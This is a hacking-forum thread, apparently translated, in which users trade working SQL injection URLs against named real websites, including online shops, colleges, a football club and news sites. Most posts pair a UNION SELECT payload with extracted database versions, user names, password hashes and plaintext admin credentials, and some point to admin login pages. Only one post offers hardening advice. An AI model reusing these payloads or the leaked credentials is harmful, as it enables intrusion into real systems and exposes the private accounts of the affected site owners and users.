SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. x88x

    oh yes, I almost forgot =)
    a foreign online shop (Australian)

    Code:
    _http://www.australianopenshop.com/category.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,VERSION(),12/*
    MySQL version: 5.0.27-community-nt
    User: ausopen@netregis-8cuqdh
    Database: ausopen


    I looked through the tables; the only ones worth noting are:
    tblbilling
    tblmember
    tblorder
    tblorderprod
    tblsiteadmin
    tbluser
     
  2. 159932

    moblog.co.uk
    http://moblog.co.uk/forum
    for the forum
    mat:bigmoney
     
  3. Sleep

    4.0.27-standard
    HTML:
    http://www.plantgeek.net/article_viewer.php?id=99999999999999+union+select+1,2,concat(version(),database(),user()),4,5,6,7,8,9,1,2,3/*
    4.1.22-log
    HTML:
    http://www.valleys.ru/work.php?id=-9+union+select+1,2,database(),user(),5,6,version(),8,9--
    4.1.20-max-log
    HTML:
    http://www.freepoc.org/viewapp.php?id=-1+union+select+1,version(),3,4,5,6,7,user()--
    HTML:
    http://www.rabidhardware.net/index.php?profile=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,TABLE_NAME,7,8,9,0,1,2,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES/*
     
    #4843 Sleep, 19 Feb 2008
    Last edited: 19 Feb 2008
  4. Maxyks

    old news =D
    Code:
    http://www.legal-info-legale.nb.ca/showpub.asp?id=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)-- 
    'pleisadmin:s09ofk48f'
    enter it twice.
     
  5. Kakoytoxaker

    SPRAVIZDAT - YELLOW PAGES

    _http://www.spr.ru/view.php?id_firm=-22775'+union+select+1,concat(user,char(58),password),3+from+mysql.user+limit+0,1/*

    spraviz8_sam:*26F07D3B38B5FAC4BA063A5D76D2895C73319D78
     
  6. CaNNabi$

    www.resheto.ru
    Code:
    http://resheto.ru/photo/index.php?id=0x2d3127%20union+select+1,2,3/*
    
    5.0.32-Debian_7etch1-log/resheto/[email protected]
    in the top hundred by the rating on Mail)

    Code:
    http://thefamilyrecords.com/artists.php?artists_id=0x2d3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*
    
    5.0.24a-standard-log/family_records/[email protected]

    -------------------------------------------------------------
    jokester is simply awesome) no words :) I'm still blown away)
     
  7. Климент_Ворошилов

    Official site of the football club "Metallurg" Zaporozhye.
    http://www.fcmetalurg.com/club/about_team.php?tid=-5+union+select+passwd,2,3,login,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+users/*

    4.0.27-sta

    Moderator-admin on the forum - Fidel:tura
     
  8. Momiji

    wan-press.org
    Code:
    http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database())/*
    5.0.32-Debian_7etch1-logroot@localhostnewwan
    Code:
    http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat(user,0x3,password)+from+mysql.user/*
    Users table: front_users
    Columns: fuser_login, fuser_passwd, fuser_email
    I couldn't find the database this table is in; I couldn't get it out through the schema, the damn script won't allow it.
     
  9. Sleep

    http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,FUSER_PASSWD,4+FROM+3may.Front_users/*
    But it looks like they are all empty
    But there is http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,concat(BUSER_LOGIN,0x3A,BUSER_PASSWD),4+FROM+3may.Back_users/*
    Login:3mayAdmin
    Pass:Em&y6wan!
     
    #4849 Sleep, 20 Feb 2008
    Last edited: 20 Feb 2008
  10. b3

    www.symbiant.org & www.reciprocity.cc
     
  11. vp$

    a Romanian sex shop

    www.sex-shop.ro

    http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,version(),5,6,7,8/*
    4.1.20 /*but no need to be upset*/
    http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,concat_ws(0x3a,login,pass),5,6,7,8+from+user/*
    mishu:dellinspiron1300

    http://www.sex-shop.ro/admin/login.php
    log in and administer ;)
     
  12. Sleep

    http://team-rs.ru/member.php?id=-4%2527+union+select+1,2,3,4,TABLE_NAME,6,user(),8,9,0+FROM+INFORMATION_SCHEMA.TABLES/*
     
    #4852 Sleep, 20 Feb 2008
    Last edited: 20 Feb 2008
  13. 1NtR0

    www.dominican.edu

    Code:
    http://www.dominican.edu/query/ncur/display_ncur.php?id=-2161+union+select+1,2,3,4,5,6,7,user(),database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68.69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119/*
    user() - DUOC_ONLINE@NACIO1
    database() - dominican
    version() - 5.0.26-log
     
  14. Haruka

    http://borowiha.inetrus.ru/top/inf.php?sid='+union+select+id,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+where+id=2/*
    ---
    here's another one, but I couldn't dig any further here. If anyone manages to, write me in private:
    http://wap-top.ru/top/index.php?p=-1
     
  15. Haruka

    and another one
    http://kyky.biz/bibl/index.php?i=1&ver=xml&letter='+union+select+1,2,3,4,5/*
     
  16. Sleep

    http://www.cz-usa.com/product_detail.php?id=159999999+union+select+1,2,VERSION(),USER(),DATABASE(),6/*
    VERSION:4.0.21
     
  17. b3

    The official site of the becontent web engine. I really liked its administrative section. The site has a download link; if you change the hashing algorithm from the standard md5 to md5(md5($pass)) or add a salt, it is quite a good engine.
    And here is the vulnerability itself (trivial):
    alfonso : pippo12
    I blocked access to the administrative section and removed the administrator privileges, so that there would be no repeat defacements, as the "wannabe hackers" like to do.

    SCREENSHOT:
    [IMG]

    P.S. Filter the variables, change the hash algorithm, don't set easy passwords and work with the DB without file_priv, and it's an excellent engine.
    P.S.S. The link in the screenshot is NOT an advertisement!!!
     
    #4857 b3, 21 Feb 2008
    Last edited: 21 Feb 2008
  18. satana8920

    HTML:
    http://www.kensybrowns.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
    HTML:
    http://www.arok.dk/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    HTML:
    http://www.pinocchioclub.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    HTML:
    http://www.irmilano.it/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    HTML:
    http://www.maddenitalianleague.eu/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
    HTML:
    http://www.radiyocristal.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    change the value in the ID variable and view the password hash of any user
    P.S. all for Antichat
     
  19. 1NtR0

    www.antioch-college.edu


    Code:
    http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
    user() - acollege_colleg1@localhost
    database() - acollege_college1
    version() - 5.0.27-standard

    Code:
    http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,id,4,password,6,7,8,9,10,11,12+from+users/*
    id - 13
    md5($password) - 97d735d01e2c3e9ba77719db119b8404
    password - amaruyama
     
  20. CaNNabi$

    Code:
    http://www.vergelijking.be/gsm/data.php?id=0x3127%20union+select+concat_ws(0x2F,version(),database(),user())/*
    
    5.0.32-Debian_7etch1-log/vergelijking/vergelijking@localhost

    Code:
    http://www.hubbardbrook.org/gis/data.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8/*
    
    4.1.21-community-nt/hbr/[email protected]' in

    Code:
    http://www.dogrel.com/English/News/article.php?id=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
    
    4.1.21/DB_dogrel/dogrel@localhost

    Code:
    http://www.jdhindia.com/data.php?id=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user())/*
    
    4.1.22-standard-log/loejclsy_jdh/loejclsy_jdh@localhost

    Code:
    http://www.somborvaros.org/data.php?lang=sr&id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*
    
    4.0.18/somborvaros/[email protected]
     